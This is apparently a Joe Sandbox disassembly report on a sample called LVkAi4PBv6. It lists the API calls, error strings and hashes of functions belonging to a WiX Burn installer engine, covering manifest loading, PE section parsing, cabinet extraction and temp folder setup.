                                                                                                                                                                                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ET\$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-1325008406
                                                                                                                                                                                                                                                                                                  • Opcode ID: a21efa6dd22913ac872a2c0b0a0fa180e1e328659fffbd7873fd9446cb3ba3f0
                                                                                                                                                                                                                                                                                                  • Instruction ID: da115ce1aef979508f3eb3a230ed53596a6c966c61539ffa09ff09fd7b23474f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a21efa6dd22913ac872a2c0b0a0fa180e1e328659fffbd7873fd9446cb3ba3f0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97E19736E84675BECB1196E0CC42FEEBAA7BB05710F16023DFA11FA291D7615E8097D0

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 005CB502
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB550
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 005CB556
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,aD\H,00000040,?,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB59E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 005CB5A4
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB601
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB607
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB650
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB656
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB6C7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB6CD
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB716
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB71C
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB765
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB76B
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB7B7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB7BD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB810
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB872
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB8FC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB906
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aD\H$burn$section.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3411815225-3353476469
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf7f419e358a79547cd69df66a483272cf6646aeec79dcc046f2388b6a27e387
                                                                                                                                                                                                                                                                                                  • Instruction ID: 278f3eefc793753c51ce9ca3c8a2db0ae80d302f30590ee75176f13c5b188130
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf7f419e358a79547cd69df66a483272cf6646aeec79dcc046f2388b6a27e387
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C12E77698023AAFEB349A94CC46FAB7EA5FB44710F11469DFD04BB281E7719D408BD0

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,005E08BC,?,?), ref: 005E0D25
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,005E08BC,?,?), ref: 005E0D2F
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,005E08BC,?,?), ref: 005E0D74
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,005E08BC,?,?), ref: 005E0D7F
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,?,?,005E08BC,?,?), ref: 005E0DB7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,005E08BC,?,?), ref: 005E0DC1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1865021742-2104912459
                                                                                                                                                                                                                                                                                                  • Opcode ID: a328f9486b023f7bec596158ecf59e7b1754dc449fff28adb25bf35817c3c98b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 95c6a90957e46611b7b3f37d795f61b154d10c4431ac4edc04b5adbea0068876
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a328f9486b023f7bec596158ecf59e7b1754dc449fff28adb25bf35817c3c98b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 949149379C26B367D73916E64D0DF6B2D52BF00B20F129624BE91BE6D0D3A1DC8082D5

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 005C5217
                                                                                                                                                                                                                                                                                                    • Part of subcall function 006004F8: InitializeCriticalSection.KERNEL32(0062B5FC,?,005C5223,00000000,?,?,?,?,?,?), ref: 0060050F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,005C523F,00000000,?), ref: 005C1248
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C120A: GetLastError.KERNEL32(?,?,?,005C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 005C1252
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 005C5285
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00600E28
                                                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 005C5317
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005C5321
                                                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C558E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 005C5345
                                                                                                                                                                                                                                                                                                  • Failed to run per-user mode., xrefs: 005C5494
                                                                                                                                                                                                                                                                                                  • Failed to initialize Regutil., xrefs: 005C52C9
                                                                                                                                                                                                                                                                                                  • Failed to get OS info., xrefs: 005C534F
                                                                                                                                                                                                                                                                                                  • Failed to run untrusted mode., xrefs: 005C54B6
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 005C5245
                                                                                                                                                                                                                                                                                                  • Failed to run RunOnce mode., xrefs: 005C541C
                                                                                                                                                                                                                                                                                                  • Failed to run embedded mode., xrefs: 005C5444
                                                                                                                                                                                                                                                                                                  • Invalid run mode., xrefs: 005C53F9
                                                                                                                                                                                                                                                                                                  • Failed to initialize core., xrefs: 005C53C3
                                                                                                                                                                                                                                                                                                  • Failed to run per-machine mode., xrefs: 005C546C
                                                                                                                                                                                                                                                                                                  • Failed to initialize engine state., xrefs: 005C526C
                                                                                                                                                                                                                                                                                                  • Failed to initialize Wiutil., xrefs: 005C52E1
                                                                                                                                                                                                                                                                                                  • Failed to initialize Cryputil., xrefs: 005C52A6
                                                                                                                                                                                                                                                                                                  • Failed to initialize XML util., xrefs: 005C52F9
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM., xrefs: 005C5291
                                                                                                                                                                                                                                                                                                  • 3.11.1.2318, xrefs: 005C5384
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get manifest stream from container., xrefs: 005D75CC
                                                                                                                                                                                                                                                                                                  • Failed to get unique temporary folder for bootstrapper application., xrefs: 005D77CE
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 005D7759
                                                                                                                                                                                                                                                                                                  • Failed to open attached UX container., xrefs: 005D758E
                                                                                                                                                                                                                                                                                                  • Failed to overwrite the %ls built-in variable., xrefs: 005D76BB
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 005D7667
                                                                                                                                                                                                                                                                                                  • Failed to extract bootstrapper application payloads., xrefs: 005D77EF
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessFolder, xrefs: 005D7734
                                                                                                                                                                                                                                                                                                  • Failed to get source process folder from path., xrefs: 005D7725
                                                                                                                                                                                                                                                                                                  • WixBundleElevated, xrefs: 005D76A5, 005D76B6
                                                                                                                                                                                                                                                                                                  • Failed to initialize variables., xrefs: 005D7571
                                                                                                                                                                                                                                                                                                  • Failed to set original source variable., xrefs: 005D776A
                                                                                                                                                                                                                                                                                                  • Failed to open manifest stream., xrefs: 005D75AB
                                                                                                                                                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 005D779F
                                                                                                                                                                                                                                                                                                  • Failed to set source process path variable., xrefs: 005D7709
                                                                                                                                                                                                                                                                                                  • WixBundleUILevel, xrefs: 005D76D6, 005D76E7
                                                                                                                                                                                                                                                                                                  • Failed to load manifest., xrefs: 005D75E8
                                                                                                                                                                                                                                                                                                  • Failed to load catalog files., xrefs: 005D780F
                                                                                                                                                                                                                                                                                                  • Failed to set source process folder variable., xrefs: 005D7745
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessPath, xrefs: 005D76F8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,005C5489), ref: 005D8310
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600879: OpenProcessToken.ADVAPI32(?,00000008,?,005C53BD,00000000,?,?,?,?,?,?,?,005D769D,00000000), ref: 00600897
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600879: GetLastError.KERNEL32(?,?,?,?,?,?,?,005D769D,00000000), ref: 006008A1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,005D769D,00000000), ref: 0060092B
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 005D8336
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005D8340
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 005D83BD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005D83C7
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 005D8406
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to concat Temp directory on windows path for working folder., xrefs: 005D83AD
                                                                                                                                                                                                                                                                                                  • Failed to create working folder guid., xrefs: 005D8413
                                                                                                                                                                                                                                                                                                  • Temp\, xrefs: 005D8395
                                                                                                                                                                                                                                                                                                  • Failed to convert working folder guid into string., xrefs: 005D8446
                                                                                                                                                                                                                                                                                                  • Failed to get temp path for working folder., xrefs: 005D83F5
                                                                                                                                                                                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 005D8470
                                                                                                                                                                                                                                                                                                  • %ls%ls\, xrefs: 005D8458
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 005D8364, 005D83EB, 005D843C
                                                                                                                                                                                                                                                                                                  • Failed to ensure windows path for working folder ended in backslash., xrefs: 005D838B
                                                                                                                                                                                                                                                                                                  • Failed to get windows path for working folder., xrefs: 005D836E
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder path., xrefs: 005D848B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 266130487-819636856
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0bbaa04d02bd57f20413a1c36a8a4062bce604d8d235717ddecfdccbb540c72d
                                                                                                                                                                                                                                                                                                  • Instruction ID: be6fb1a43c3edaa2b692bd9cda35652a534351a9f29ce22b844a618baab35e44
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bbaa04d02bd57f20413a1c36a8a4062bce604d8d235717ddecfdccbb540c72d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE412D76E41726BBDB30A6E8CC09FAB7B69BB00B10F158557BA08F7340DE749D4086D5

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 005E111D
                                                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 005E1398
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3442037557-1168358783
                                                                                                                                                                                                                                                                                                  • Opcode ID: eea513bfe7eab6dc2fc862473ec2db1b4614d3251a3fa108bd4f304f13cce9c1
                                                                                                                                                                                                                                                                                                  • Instruction ID: bbee48c55c8c4ae653f58ece333e6757dbf3e3831503e995fe0837931fd2ce8e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eea513bfe7eab6dc2fc862473ec2db1b4614d3251a3fa108bd4f304f13cce9c1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72517C3BD859E2D7CB2856D78C05EBB3D15BB44720B264765BE81FB2D0D6358C0092DD

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C4303
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(000000D0,?,?,005C5266,?,?,00000000,?,?), ref: 005C430C
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,005C5266,?,?,00000000,?,?), ref: 005C4352
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C435C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C4370
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,005C5266,?,?,00000000,?,?), ref: 005C4380
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,005C5266,?,?,00000000,?,?), ref: 005C43D0
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C43DA
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C43EE
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,005C5266,?,?,00000000,?,?), ref: 005C43FE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3039292287-3209860532
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94eecb505713aa0ee41e9a83512f229a428b9d0a1ff23b093aab4f4a4d42fcb5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 130d5fc8e55124d0314dafac876c3d67270058ce05707b01f119f75ae3834cce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94eecb505713aa0ee41e9a83512f229a428b9d0a1ff23b093aab4f4a4d42fcb5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B51B571A80215BFDB28DFA8CC96F5B7B6DFF04760F11811AF614D7290D7B0A950CAA4

Control-flow Graph: function at 5de7b4 (legend: Executed / Not Executed)
APIs
• TlsSetValue.KERNEL32(?,?), ref: 005DE7FF
• RegisterClassW.USER32(?), ref: 005DE82B
• GetLastError.KERNEL32 ref: 005DE836
• CreateWindowExW.USER32(00000080,00619E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 005DE89D
• GetLastError.KERNEL32 ref: 005DE8A7
• UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 005DE945
Strings
Memory Dump Source
• Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
Similarity
• API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
• String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
• API String ID: 213125376-288575659
• Opcode ID: 85e299505a9660dbff6f94a14a99efbf8cb36ae36e690aac1138b65d765d7ad0
• Instruction ID: 4aa0d8b7689e8477dc37c08252d396e7b7af3d264085376d5d353272d2ffbd26
• Opcode Fuzzy Hash: 85e299505a9660dbff6f94a14a99efbf8cb36ae36e690aac1138b65d765d7ad0
• Instruction Fuzzy Hash: C141A372941215ABDB349BA4DC45ADFBFB9FF08760F218127F905AA240D731AD41DBA0

